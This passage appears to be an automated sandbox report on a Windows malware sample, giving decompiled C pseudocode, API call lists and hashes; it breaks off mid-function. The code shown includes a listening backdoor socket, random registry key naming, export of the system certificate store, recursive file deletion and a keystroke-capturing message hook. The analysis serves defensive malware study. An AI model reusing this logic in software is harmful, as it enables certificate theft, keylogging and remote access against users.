    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,.exe,00000006), ref: 004101C1
    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,?,.exe,00000006), ref: 004101D0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Free$Path$BufferCloseFolderHandleLibraryUserVirtual$AddressCombineEnumInfoLoadProc
    • String ID: .exe
    • API String ID: 491488961-4119554291
    • Opcode ID: c1c7b63d7f9e79b11a59a0d499a55382066def59abf0e4f6521b7fc3e00dba7d
    • Instruction ID: 0d7ad36b224aa8f1dd3ef3ba2258d9b1e6e3578f5663fcd2a948b1834b20ccb8
    • Opcode Fuzzy Hash: c1c7b63d7f9e79b11a59a0d499a55382066def59abf0e4f6521b7fc3e00dba7d
    • Instruction Fuzzy Hash: AC91E571608301AFD720DF20DC44BEBB7A8AF85744F04492EF985B7290DB79D989C79A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 30%
    			E00406D40(signed int __eax, void* _a4) {
    				intOrPtr _v28;
    				short _v130;
    				signed short _v132;
    				char _v144;
    				intOrPtr _v148;
    				char _v156;
    				char _v160;
    				signed int _v166;
    				void* __esi;
    				long _t29;
    				signed int _t30;
    				intOrPtr _t34;
    				void* _t36;
    				signed int _t37;
    				void* _t50;
    				intOrPtr* _t53;
    				signed int _t68;
    				signed int _t69;
    				signed int _t70;
    				signed int _t71;
    				intOrPtr* _t72;
    				signed int* _t75;
    
    				_t75 = _a4;
    				_t68 = __eax;
    				if(__eax == 0 || E00406CC0(__eax, _t75) == 0) {
    					E00410870( &_v132,  &_v132, 0, 0x80);
    					_t53 = __imp__#23;
    					_t72 = __imp__#2;
    					_v144 = 2;
    					_v148 = 0x9c40;
    					do {
    						_t29 = GetTickCount();
    						if(_t29 !=  *0x42dd08) {
    							 *0x42dd08 = _t29;
    							E00412320(_t29);
    						}
    						_t30 = E00412360();
    						asm("rol dx, 0x8");
    						_v130 = _t30 % 0x7531 + 0x2710;
    						_t69 =  *_t53(_v132 & 0x0000ffff, 1, 6);
    						if(_t69 == 0xffffffff) {
    							goto L9;
    						} else {
    							_t50 =  *_t72(_t69,  &_v144, ((0 | _v144 != 0x00000002) - 0x00000001 & 0xfffffff4) + 0x1c);
    							if(_t50 != 0) {
    								L8:
    								__imp__#3(_t69);
    								goto L9;
    							} else {
    								__imp__#13(_t69, 0x7fffffff);
    								if(_t50 != 0) {
    									goto L8;
    								}
    							}
    						}
    						L11:
    						 *_t75 = _t69;
    						if(_t69 == 0xffffffff) {
    							L17:
    							 *_t75 = 0xffffffff;
    							_a4 = 0;
    							return 0;
    						} else {
    							_t36 = CreateEventW(0, 0, 0, 0);
    							_a4 = _t36;
    							if(_t36 == 0) {
    								L15:
    								_t70 =  *_t75;
    								if(_t70 != 0xffffffff) {
    									__imp__#22(_t70, 2);
    									__imp__#3(_t70);
    								}
    								goto L17;
    							} else {
    								__imp__WSAEventSelect( *_t75, _t36, 8);
    								if(_t36 == 0) {
    									_t37 =  *_t75;
    									_v160 = 0x80;
    									__imp__#6(_t37,  &_v156,  &_v160);
    									if(_t37 != 0) {
    										_t71 =  *_t75;
    										if(_t71 != 0xffffffff) {
    											__imp__#22(_t71, 2);
    											__imp__#3(_t71);
    										}
    										CloseHandle(_a4);
    										return 0;
    									} else {
    										asm("rol cx, 0x8");
    										_t68 = _v166 & 0x0000ffff;
    										goto L20;
    									}
    								} else {
    									CloseHandle(_a4);
    									goto L15;
    								}
    							}
    						}
    						goto L24;
    						L9:
    						_t34 = _v148 - 1;
    						_v148 = _t34;
    					} while (_t34 > 0);
    					_t69 = _t69 | 0xffffffff;
    					goto L11;
    				} else {
    					L20:
    					E00406CC0(_t68, _v28);
    					return _t68;
    				}
    				L24:
    			}

    APIs
    • GetTickCount.KERNEL32 ref: 00406DA0
    • socket.WS2_32(?,00000001,00000006), ref: 00406DDF
    • bind.WS2_32(00000000,00000002,-0000001D), ref: 00406E01
    • listen.WS2_32(00000000,7FFFFFFF), ref: 00406E0D
    • closesocket.WS2_32(00000000), ref: 00406E18
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00406E42
    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 00406E56
    • CloseHandle.KERNEL32(?,?,00000000,00000008), ref: 00406E64
    • shutdown.WS2_32(00000000,00000002), ref: 00406E75
    • closesocket.WS2_32(00000000), ref: 00406E7C
      • Part of subcall function 00406CC0: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00406EDE), ref: 00406CE1
      • Part of subcall function 00406CC0: WSAEventSelect.WS2_32(00000000,00000000,00000008), ref: 00406CF4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Event$CreateSelectclosesocket$CloseCountHandleTickbindlistenshutdownsocket
    • String ID: p0u
    • API String ID: 2712627274-1742372003
    • Opcode ID: a649ecc298422131f00562a53d64640d4274286561326de312c0385d1576d7da
    • Instruction ID: 2a6aec74382d51fed9e26fb3b63c60e84e2ac8c414d2a019a1c466be1411b144
    • Opcode Fuzzy Hash: a649ecc298422131f00562a53d64640d4274286561326de312c0385d1576d7da
    • Instruction Fuzzy Hash: 4941D435204201ABD310AF24DD45BAB77A4FBC4760F01863AF956FB2E0E778D9198769
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E00416AB0() {
    				long _t57;
    				long _t59;
    				long _t63;
    				long _t70;
    				long _t77;
    				long _t82;
    				unsigned int* _t84;
    				unsigned int* _t85;
    				short _t88;
    				signed int _t89;
    				void* _t100;
    				intOrPtr _t112;
    				intOrPtr _t113;
    				signed int _t115;
    				intOrPtr _t117;
    				short* _t120;
    				void* _t122;
    				signed int _t131;
    				void* _t133;
    
    				_t88 = 0;
    				 *((char*)(_t133 + 0x2b)) = 0;
    				_t57 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0, _t133 + 0x18, 0);
    				if(_t57 == 0) {
    					 *(_t133 + 0x1c) = _t57;
    					do {
    						_t59 = GetTickCount();
    						if(_t59 !=  *0x42dd08) {
    							 *0x42dd08 = _t59;
    							E00412320(_t59);
    						}
    						_t10 = _t60 - (0xaaaaaaab * E00412360() >> 0x20 >> 1) + (0xaaaaaaab * E00412360() >> 0x20 >> 1) * 2 + 4; // 0x4
    						_t115 = _t10;
    						 *(_t133 + 0x18) = _t115;
    						_t63 = GetTickCount();
    						if(_t63 !=  *0x42dd08) {
    							 *0x42dd08 = _t63;
    							E00412320(_t63);
    						}
    						if((E00412360() & 0x00000100) == 0) {
    							 *((intOrPtr*)(_t133 + 0x2c)) = "aeiouy";
    							 *((intOrPtr*)(_t133 + 0x30)) = "bcdfghklmnpqrstvwxz";
    						} else {
    							 *((intOrPtr*)(_t133 + 0x2c)) = "bcdfghklmnpqrstvwxz";
    							 *((intOrPtr*)(_t133 + 0x30)) = "aeiouy";
    						}
    						_t89 = 0;
    						_t131 = 0;
    						 *(_t133 + 0x14) = 0;
    						if(_t115 != 0) {
    							L12:
    							while(1) {
    								if(_t131 == 2) {
    									_t82 = GetTickCount();
    									if(_t82 !=  *0x42dd08) {
    										 *0x42dd08 = _t82;
    										 *0x42dd10 = _t82;
    										_t19 = _t131 - 1; // -1
    										_t113 = _t19;
    										_t84 = 0x42dd10;
    										do {
    											_t84[1] = ( *_t84 >> 0x0000001e ^  *_t84) * 0x6c078965 + _t113;
    											_t84 =  &(_t84[1]);
    											_t113 = _t113 + 1;
    										} while (_t84 < 0x42e6cc);
    										 *0x42e6dc = _t113;
    									}
    									if((E00412360() & 0x00000100) == 0) {
    										 *((intOrPtr*)(_t133 + 0x2c)) = "aeiouy";
    										 *((intOrPtr*)(_t133 + 0x30)) = "bcdfghklmnpqrstvwxz";
    									} else {
    										 *((intOrPtr*)(_t133 + 0x2c)) = "bcdfghklmnpqrstvwxz";
    										 *((intOrPtr*)(_t133 + 0x30)) = "aeiouy";
    									}
    									_t131 = 0;
    								}
    								_t117 =  *((intOrPtr*)(_t133 + 0x2c + _t131 * 4));
    								asm("sbb eax, eax");
    								_t30 = ( ~(_t117 - "bcdfghklmnpqrstvwxz") & 0xfffffff3) + 0x12; // 0x26
    								_t122 = _t30;
    								if(_t122 != 0) {
    									_t77 = GetTickCount();
    									if(_t77 !=  *0x42dd08) {
    										 *0x42dd08 = _t77;
    										 *0x42dd10 = _t77;
    										_t112 = 1;
    										_t85 = 0x42dd10;
    										do {
    											_t85[1] = ( *_t85 >> 0x0000001e ^  *_t85) * 0x6c078965 + _t112;
    											_t85 =  &(_t85[1]);
    											_t112 = _t112 + 1;
    										} while (_t85 < 0x42e6cc);
    										_t89 =  *(_t133 + 0x14);
    										 *0x42e6dc = _t112;
    									}
    									_t100 = E00412360() - _t78 / (_t122 + 1) * (_t122 + 1);
    								} else {
    									_t100 = 0;
    								}
    								( *(_t133 + 0x38))[_t89] =  *((char*)(_t117 + _t100));
    								_t89 = _t89 + 1;
    								_t131 = _t131 + 1;
    								 *(_t133 + 0x14) = _t89;
    								if(_t89 <  *(_t133 + 0x18)) {
    									continue;
    								}
    								_t115 =  *(_t133 + 0x18);
    								goto L30;
    							}
    						}
    						L30:
    						_t120 =  *(_t133 + 0x38);
    						_t120[_t115] = 0;
    						 *_t120 = CharUpperW( *_t120 & 0x0000ffff);
    						if(RegCreateKeyExW( *(_t133 + 0x3c), _t120, 0, 0, 0, 3, 0, _t133 + 0x28, _t133 + 0x28) != 0) {
    							goto L32;
    						} else {
    							RegCloseKey( *(_t133 + 0x24));
    							if( *(_t133 + 0x28) == 1) {
    								_t88 = 1;
    							} else {
    								goto L32;
    							}
    						}
    						L35:
    						RegCloseKey( *(_t133 + 0x20));
    						goto L36;
    						L32:
    						_t70 =  *(_t133 + 0x1c) + 1;
    						 *(_t133 + 0x1c) = _t70;
    					} while (_t70 < 0x64);
    					_t88 =  *((intOrPtr*)(_t133 + 0x13));
    					goto L35;
    				}
    				L36:
    				return _t88;
    			}

    APIs
    • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00416AD5
    • GetTickCount.KERNEL32 ref: 00416AF6
    • GetTickCount.KERNEL32 ref: 00416B26
    • GetTickCount.KERNEL32 ref: 00416B8B
    • CharUpperW.USER32(00000000), ref: 00416CA9
    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?), ref: 00416CCC
    • RegCloseKey.ADVAPI32(?), ref: 00416CDB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CountTick$Create$CharCloseUpper
    • String ID: SOFTWARE\Microsoft$aeiouy$bcdfghklmnpqrstvwxz
    • API String ID: 1427789485-1268794116
    • Opcode ID: b143b084f1e0a7b97b0cfd57dee0f8b273a38636cfda536ca1279f0451b01eea
    • Instruction ID: d8b77f8d14d1a311e8b9700437058f9950765cc0a594941bb8ca4bc3bbb6ea8b
    • Opcode Fuzzy Hash: b143b084f1e0a7b97b0cfd57dee0f8b273a38636cfda536ca1279f0451b01eea
    • Instruction Fuzzy Hash: 1261E4706443109FC314DF25D88579ABBE4EB88304F55853FE981EB2A0D778E986CB9D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 59%
    			E00412C70(void* _a4) {
    				char _v8;
    				WCHAR* _v16;
    				struct _STARTUPINFOW _v88;
    				WCHAR* _v101;
    				struct _PROCESS_INFORMATION _v104;
    				intOrPtr _v108;
    				signed int _v112;
    				char _v113;
    				_Unknown_base(*)()* _t26;
    				void* _t38;
    				WCHAR* _t45;
    				struct HINSTANCE__* _t49;
    				intOrPtr* _t50;
    				void* _t53;
    
    				_v101 = 0;
    				_t49 = LoadLibraryA("userenv.dll");
    				if(_t49 == 0) {
    					return 0;
    				} else {
    					_t50 = GetProcAddress(_t49, "CreateEnvironmentBlock");
    					_t26 = GetProcAddress(_t49, "DestroyEnvironmentBlock");
    					_v104.dwProcessId = _t26;
    					if(_t50 != 0 && _t26 != 0) {
    						_t53 = _a4;
    						_push(0);
    						_push(_t53);
    						_push( &(_v104.hThread));
    						_v104.hThread = 0;
    						if( *_t50() == 0) {
    							_v112 = 0;
    						}
    						_v8 = 0;
    						E00410870(_t30,  &_v88, 0, 0x44);
    						_t45 = _v16;
    						_v104.hThread = 0x44;
    						_v104.dwThreadId = 0;
    						if(_t45 == 0) {
    							_t45 =  &_v8;
    						}
    						asm("sbb eax, eax");
    						if(CreateProcessAsUserW(_t53, 0, _t45, 0, 0, 0,  ~_v112 & 0x00000400 | 0x04000000, _v112, 0,  &_v88,  &_v104) != 0) {
    							CloseHandle(_v104.hThread);
    							CloseHandle(_v104);
    							_v113 = _v104.dwProcessId != 0;
    						}
    						_t38 = _v112;
    						if(_t38 != 0) {
    							_v108(_t38);
    						}
    					}
    					FreeLibrary(_t49);
    					return _v101 & 0x000000ff;
    				}
    			}

    APIs
    • LoadLibraryA.KERNEL32(userenv.dll,?,?,?,00000000), ref: 00412C82
    • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00412C9E
    • GetProcAddress.KERNEL32(00000000,DestroyEnvironmentBlock), ref: 00412CA8
    • CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 00412D34
    • CloseHandle.KERNEL32(?), ref: 00412D49
    • CloseHandle.KERNEL32(?), ref: 00412D50
    • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 00412D69
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
    • String ID: CreateEnvironmentBlock$D$DestroyEnvironmentBlock$userenv.dll
    • API String ID: 3080530829-87856036
    • Opcode ID: c5c258d8c0f9c0e66dc18484a32c16c5802c345c7fb51a66f2361cafa8584564
    • Instruction ID: fb4dc9fc9105082488463cdaf7cb7d5b968f38b40d4c37c8c112d1a28e73aba2
    • Opcode Fuzzy Hash: c5c258d8c0f9c0e66dc18484a32c16c5802c345c7fb51a66f2361cafa8584564
    • Instruction Fuzzy Hash: A63192B2504345AFD720DF64DD81EABBBECFB84748F04482EFA85E2150D678DD488B66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00418700(long __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
    				short _v524;
    				short _v532;
    				char _v540;
    				short _v1076;
    				intOrPtr _v1078;
    				struct _WIN32_FIND_DATAW _v1124;
    				intOrPtr _v1128;
    				WCHAR* _v1132;
    				void* _v1136;
    				signed int _t47;
    				int _t49;
    				signed int _t51;
    				intOrPtr _t53;
    				signed int _t56;
    				long _t65;
    				void* _t68;
    				WCHAR* _t70;
    				WCHAR* _t73;
    				WCHAR* _t80;
    				intOrPtr _t90;
    				signed int _t93;
    				long _t94;
    
    				_v1124.ftCreationTime = __edx;
    				_t80 = __ecx;
    				_v1124.dwFileAttributes = __ecx;
    				_t70 = "*";
    				L1:
    				_t47 =  *_t70 & 0x0000ffff;
    				if(_t47 == 0x5c || _t47 == 0x2f) {
    					_t70 =  &(_t70[1]);
    					goto L1;
    				}
    				_t49 = PathCombineW( &_v524, _t80, _t70);
    				if(_t49 == 0) {
    					L37:
    					return _t49;
    				}
    				_t49 = FindFirstFileW( &_v532,  &_v1124);
    				_v1136 = _t49;
    				if(_t49 == 0xffffffff) {
    					goto L37;
    				}
    				_t68 = _a20;
    				_t90 = _a4;
    				while(_t68 == 0 || WaitForSingleObject(_t68, 0) == 0x102) {
    					if(_v1124.cFileName != 0x2e) {
    						L13:
    						_t51 = _v1124.dwFileAttributes & 0x00000010;
    						if(_t51 == 0 || (_a8 & 0x00000002) == 0) {
    							if(_t51 != 0 || (_a8 & 0x00000004) == 0) {
    								goto L25;
    							} else {
    								goto L17;
    							}
    						} else {
    							L17:
    							_t93 = 0;
    							if(_t90 == 0) {
    								L25:
    								if((_v1124.dwFileAttributes & 0x00000010) == 0 || (_a8 & 0x00000001) == 0) {
    									L35:
    									if(FindNextFileW(_v1136,  &_v1124) != 0) {
    										continue;
    									}
    									break;
    								} else {
    									_t73 =  &(_v1124.cFileName);
    									while(1) {
    										_t56 =  *_t73 & 0x0000ffff;
    										if(_t56 != 0x5c && _t56 != 0x2f) {
    											break;
    										}
    										_t73 =  &(_t73[1]);
    									}
    									if(PathCombineW( &_v532, _v1132, _t73) != 0) {
    										_t94 = _a24;
    										if(_t94 != 0) {
    											Sleep(_t94);
    										}
    										E00418700( &_v540, _v1136, _t90, _a8, _a12, _a16, _t68, _t94, _a28);
    									}
    									goto L35;
    								}
    							}
    							while(PathMatchSpecW( &(_v1124.cFileName),  *(_v1128 + _t93 * 4)) == 0) {
    								_t93 = _t93 + 1;
    								if(_t93 < _t90) {
    									continue;
    								}
    								goto L25;
    							}
    							_push(_a16);
    							if(_a12() == 0) {
    								break;
    							}
    							_t65 = _a28;
    							if(_t65 != 0) {
    								Sleep(_t65);
    							}
    							goto L25;
    						}
    					}
    					_t53 = _v1078;
    					if(_t53 == 0 || _t53 == 0x2e && _v1076 == 0) {
    						goto L35;
    					} else {
    						goto L13;
    					}
    				}
    				_t49 = FindClose(_v1136);
    				goto L37;
    			}

    APIs
    • PathCombineW.SHLWAPI(?,?,0040365E,?,00000000), ref: 0041873C
    • FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 00418757
    • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 00418777
    • PathMatchSpecW.SHLWAPI(?), ref: 004187DD
    • Sleep.KERNEL32(?), ref: 0041880D
    • PathCombineW.SHLWAPI(?,?,0000002C), ref: 00418844
    • Sleep.KERNEL32(?), ref: 00418856
    • FindNextFileW.KERNEL32(?,00000010), ref: 00418889
    • FindClose.KERNEL32(?), ref: 0041889C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FindPath$CombineFileSleep$CloseFirstMatchNextObjectSingleSpecWait
    • String ID: .
    • API String ID: 321357284-248832578
    • Opcode ID: e69983c9b567c13dbbacf9fcb2d1e53c06043e17816e2414b63cd5e5766e8278
    • Instruction ID: 7b6f186980f1e2c499ce24f9a4322bf73428a36a86d6d1bf358c26fe468fdb2a
    • Opcode Fuzzy Hash: e69983c9b567c13dbbacf9fcb2d1e53c06043e17816e2414b63cd5e5766e8278
    • Instruction Fuzzy Hash: 8641D0755043019BC720EF65CC88AEB77E9AF94740F14891EF965932A0DB38D884CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004185D0(WCHAR* __ecx) {
    				short _v556;
    				intOrPtr _v558;
    				struct _WIN32_FIND_DATAW _v604;
    				struct _WIN32_FIND_DATAW _v612;
    				short _v1116;
    				short _v1124;
    				void* _v1128;
    				short _v1132;
    				void* _v1136;
    				signed int _t20;
    				void* _t26;
    				signed int _t27;
    				intOrPtr _t32;
    				WCHAR* _t41;
    				WCHAR* _t43;
    				WCHAR* _t50;
    
    				_t50 = __ecx;
    				_t41 = "*";
    				L1:
    				_t20 =  *_t41 & 0x0000ffff;
    				if(_t20 == 0x5c || _t20 == 0x2f) {
    					_t41 =  &(_t41[1]);
    					goto L1;
    				}
    				if(PathCombineW( &_v1116, _t50, _t41) == 0) {
    					L21:
    					SetFileAttributesW(_t50, 0x80);
    					return RemoveDirectoryW(_t50) & 0xffffff00 | _t24 != 0x00000000;
    				}
    				_t26 = FindFirstFileW( &_v1124,  &_v604);
    				_v1128 = _t26;
    				if(_t26 == 0xffffffff) {
    					goto L21;
    				}
    				do {
    					if(_v604.cFileName != 0x2e) {
    						L11:
    						_t43 =  &(_v604.cFileName);
    						while(1) {
    							_t27 =  *_t43 & 0x0000ffff;
    							if(_t27 != 0x5c && _t27 != 0x2f) {
    								break;
    							}
    							_t43 =  &(_t43[1]);
    						}
    						if(PathCombineW( &_v1124, _t50, _t43) != 0) {
    							if((_v612.dwFileAttributes & 0x00000010) == 0) {
    								SetFileAttributesW( &_v1132, 0x80);
    								DeleteFileW( &_v1132);
    							} else {
    								E004185D0( &_v1132);
    							}
    						}
    						goto L19;
    					}
    					_t32 = _v558;
    					if(_t32 != 0 && (_t32 != 0x2e || _v556 != 0)) {
    						goto L11;
    					}
    					L19:
    				} while (FindNextFileW(_v1136,  &_v612) != 0);
    				FindClose(_v1136);
    				goto L21;
    			}

    APIs
    • PathCombineW.SHLWAPI(?,?,0040365E,750D46D0,00000000,?,74B05970), ref: 00418606
    • FindFirstFileW.KERNEL32(?,?,?,74B05970), ref: 00418623
    • PathCombineW.SHLWAPI(?,?,0000002C), ref: 00418689
    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004186AA
    • DeleteFileW.KERNEL32(?), ref: 004186B1
    • FindNextFileW.KERNEL32(?,?), ref: 004186C0
    • FindClose.KERNEL32(?), ref: 004186D3
    • SetFileAttributesW.KERNEL32(?,00000080,?,74B05970), ref: 004186DF
    • RemoveDirectoryW.KERNEL32(?,?,74B05970), ref: 004186E2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Find$AttributesCombinePath$CloseDeleteDirectoryFirstNextRemove
    • String ID: .
    • API String ID: 3031162630-248832578
    • Opcode ID: aaa06a57acc39cd14c7c885e6fb8443e738bfcaa9f33beb512a07759965565c1
    • Instruction ID: 04ee3962303c7269665011fb169b55e44c90ee7b1e2b5f4a88308d9256de6021
    • Opcode Fuzzy Hash: aaa06a57acc39cd14c7c885e6fb8443e738bfcaa9f33beb512a07759965565c1
    • Instruction Fuzzy Hash: 8E31D1712042056BC3349B64DD88AFB73E8EB89704F044A1FF98596290EF38D885876F
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 19%
    			E004232A0(void* __eax) {
    				char _v600;
    				char _v728;
    				char _v792;
    				char _v881;
    				intOrPtr _v889;
    				char _v896;
    				char _v897;
    				long _v900;
    				long _v904;
    				intOrPtr _v905;
    				char _v908;
    				char _v916;
    				void* _v920;
    				struct _SYSTEMTIME _v936;
    				void* _v940;
    				intOrPtr _v944;
    				char _v945;
    				void* __esi;
    				void* _t33;
    				void* _t38;
    				void* _t41;
    				signed int _t44;
    				WCHAR* _t66;
    				void* _t72;
    				void* _t73;
    				void* _t76;
    				short _t78;
    				char* _t80;
    				intOrPtr* _t81;
    				void* _t84;
    				intOrPtr* _t86;
    				signed int _t88;
    				void* _t90;
    
    				_t90 = (_t88 & 0xfffffff8) - 0x374;
    				_v881 = 0;
    				__imp__CertOpenSystemStoreW(0, 0x403968, _t72, _t76, _t84);
    				_t73 = __eax;
    				if(__eax == 0) {
    					L19:
    					return _v889;
    				} else {
    					_t86 = __imp__CertEnumCertificatesInStore;
    					_t78 = 0;
    					_t33 =  *_t86(__eax, 0);
    					if(_t33 == 0) {
    						L5:
    						_v897 = 1;
    						__imp__CertCloseStore(_t73, 0);
    						return _v905;
    					} else {
    						do {
    							_t78 = _t78 + 1;
    							_t33 =  *_t86(__eax, _t33);
    						} while (_t33 != 0);
    						if(_t78 != 0) {
    							_t80 =  &_v896;
    							_v900 = 0;
    							_v904 = 0;
    							E00424100(0xa9, _t80);
    							_push(4);
    							_push(0);
    							_t81 = __imp__PFXExportCertStoreEx;
    							_push(_t80);
    							_push( &_v904);
    							_push(_t73);
    							if( *_t81() != 0) {
    								_t38 = _v936.wSecond;
    								if(_t38 != 0) {
    									_t38 = HeapAlloc( *0x42e6d4, 8, _t38 + 4);
    								}
    								_v920 = _t38;
    								if(_t38 != 0) {
    									_push(4);
    									_push(0);
    									_push( &_v916);
    									_push( &(_v936.wSecond));
    									_push(_t73);
    									if( *_t81() != 0) {
    										_t44 = 0;
    										do {
    											_t44 = _t44 + 1;
    										} while ( *((short*)(0x403968 + _t44 * 2)) != 0);
    										_t66 =  &_v908;
    										 *((short*)(_t90 + E00410820(_t66, 0x403968, _t44 + _t44) + 0x3c)) = 0;
    										CharLowerW(_t66);
    										GetSystemTime( &_v936);
    										_t82 =  &_v792;
    										E00424100(0xaa,  &_v792);
    										E00423230( &_v600);
    										_push(_v936.wYear & 0x0000ffff);
    										_push(_v936.wMonth & 0x0000ffff);
    										_push(_v936.wDay & 0x0000ffff);
    										_push( &_v920);
    										_push( &_v600);
    										_t83 =  &_v728;
    										if(E00411D10(_t82, 0x3e,  &_v728, _t82) > 0 && E0040D620(_v944, _t83, 2, 0x403968, _t83, _v940) != 0) {
    											_v945 = 1;
    										}
    									}
    									_t41 = _v940;
    									if(_t41 != 0) {
    										HeapFree( *0x42e6d4, 0, _t41);
    									}
    								}
    							}
    							__imp__CertCloseStore(_t73, 0);
    							goto L19;
    						} else {
    							goto L5;
    						}
    					}
    				}
    			}

    APIs
    • CertOpenSystemStoreW.CRYPT32 ref: 004232BB
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 004232D5
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 004232E3
    • CertCloseStore.CRYPT32(00000000,00000000), ref: 004232F5
    • PFXExportCertStoreEx.CRYPT32(00000000,?,?,00000000,00000004), ref: 00423337
    • HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 00423356
    • PFXExportCertStoreEx.CRYPT32(00000000,?,?,00000000,00000004), ref: 00423377
    • CharLowerW.USER32(?,?,00403968,00000001), ref: 004233A9
    • GetSystemTime.KERNEL32(?,?,?,00403968,00000001), ref: 004233B4
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 00423443
    • CertCloseStore.CRYPT32(00000000,00000000), ref: 0042344C
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CertStore$CertificatesCloseEnumExportHeapSystem$AllocCharFreeLowerOpenTime
    • String ID:
    • API String ID: 684085711-0
    • Opcode ID: 1e58c83791d193b1cbcc3a0a0896f35e6513bf11ec0e6c4075032da66c80952a
    • Instruction ID: 448241edfff27b0c3298db00503b323c6344b45310cfeb0d0f3498c3b54b0351
    • Opcode Fuzzy Hash: 1e58c83791d193b1cbcc3a0a0896f35e6513bf11ec0e6c4075032da66c80952a
    • Instruction Fuzzy Hash: 7C41B671308351AAD310DF65EC05BBBBBBCDB84755F40052EBA84E2290DA78DA45C7AA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E00423840(MSG* _a4) {
    				void* _v536;
    				char _v780;
    				void* _v852;
    				char _v864;
    				short _v884;
    				void* _v896;
    				void* __edi;
    				void* __esi;
    				int _t25;
    				signed int _t26;
    				signed int _t29;
    				MSG* _t42;
    				intOrPtr* _t63;
    				char* _t67;
    				WCHAR* _t70;
    				signed int _t72;
    				void* _t74;
    
    				_t74 = (_t72 & 0xfffffff8) - 0x374;
    				_t42 = _a4;
    				if(_t42 == 0 || WaitForSingleObject( *0x42edbc, 0) == 0) {
    					L20:
    					return TranslateMessage(_t42);
    				} else {
    					_t25 = _t42->message;
    					if(_t25 != 0x201) {
    						__eflags = _t25 - 0x100;
    						if(_t25 == 0x100) {
    							__eflags = _t42->wParam - 0x1b;
    							if(_t42->wParam != 0x1b) {
    								_t26 = GetKeyboardState( &_v780);
    								__eflags = _t26;
    								if(_t26 != 0) {
    									_t29 = ToUnicode(_t42->wParam, _t42->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
    									__eflags = _t29;
    									if(_t29 > 0) {
    										__eflags = _t29 - 1;
    										if(__eflags != 0) {
    											if(__eflags > 0) {
    												goto L18;
    											} else {
    												goto L17;
